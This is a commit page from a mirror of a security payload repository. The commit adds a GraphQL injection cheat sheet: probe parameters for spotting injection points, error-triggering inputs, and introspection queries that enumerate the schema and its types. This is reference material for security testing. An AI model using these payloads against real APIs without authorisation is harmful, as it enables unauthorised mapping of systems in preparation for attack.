mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-11-10 07:04:22 +00:00
Added GraphQL injection notes
This commit is contained in:
Nick Aliferopoulos
parent
450de2c90f
commit
007a1eda83
1 changed files with 130 additions and 0 deletions
130
GraphQL Injection/README.md
Normal file
130
GraphQL Injection/README.md
Normal file
|
|
@ -0,0 +1,130 @@
|
|||
# GraphQL injection
|
||||
|
||||
GraphQL is a query language for APIs and a runtime for fulfilling those queries with existing data.
|
||||
|
||||
## Exploit
|
||||
|
||||
Identify an injection point
|
||||
|
||||
```
|
||||
?param={__schema{types{name}}}
|
||||
```
|
||||
Check if errors are visible
|
||||
|
||||
```
|
||||
?param={__schema}
|
||||
?param={}
|
||||
?param={thisdefinitelydoesnotexist}
|
||||
```
|
||||
|
||||
Enumerate Database Schema with the following GraphQL query
|
||||
|
||||
```
|
||||
fragment FullType on __Type {
|
||||
kind
|
||||
name
|
||||
description
|
||||
fields(includeDeprecated: true) {
|
||||
name
|
||||
description
|
||||
args {
|
||||
...InputValue
|
||||
}
|
||||
type {
|
||||
...TypeRef
|
||||
}
|
||||
isDeprecated
|
||||
deprecationReason
|
||||
}
|
||||
inputFields {
|
||||
...InputValue
|
||||
}
|
||||
interfaces {
|
||||
...TypeRef
|
||||
}
|
||||
enumValues(includeDeprecated: true) {
|
||||
name
|
||||
description
|
||||
isDeprecated
|
||||
deprecationReason
|
||||
}
|
||||
possibleTypes {
|
||||
...TypeRef
|
||||
}
|
||||
}
|
||||
fragment InputValue on __InputValue {
|
||||
name
|
||||
description
|
||||
type {
|
||||
...TypeRef
|
||||
}
|
||||
defaultValue
|
||||
}
|
||||
fragment TypeRef on __Type {
|
||||
kind
|
||||
name
|
||||
ofType {
|
||||
kind
|
||||
name
|
||||
ofType {
|
||||
kind
|
||||
name
|
||||
ofType {
|
||||
kind
|
||||
name
|
||||
ofType {
|
||||
kind
|
||||
name
|
||||
ofType {
|
||||
kind
|
||||
name
|
||||
ofType {
|
||||
kind
|
||||
name
|
||||
ofType {
|
||||
kind
|
||||
name
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
query IntrospectionQuery {
|
||||
__schema {
|
||||
queryType {
|
||||
name
|
||||
}
|
||||
mutationType {
|
||||
name
|
||||
}
|
||||
types {
|
||||
...FullType
|
||||
}
|
||||
directives {
|
||||
name
|
||||
description
|
||||
locations
|
||||
args {
|
||||
...InputValue
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
```
|
||||
|
||||
Enumerate the definition of interesting types using the following GraphQL query, replacing "User" with the chosen type
|
||||
|
||||
```
|
||||
{__type (name: "User") {name fields{name type{name kind ofType{name kind}}}}}
|
||||
```
|
||||
|
||||
## References
|
||||
|
||||
* [Introduction to GraphQL](https://graphql.org/learn/)
|
||||
* [GraphQL Introspection](https://graphql.org/learn/introspection/)
|
||||
|
||||
Loading…
Reference in a new issue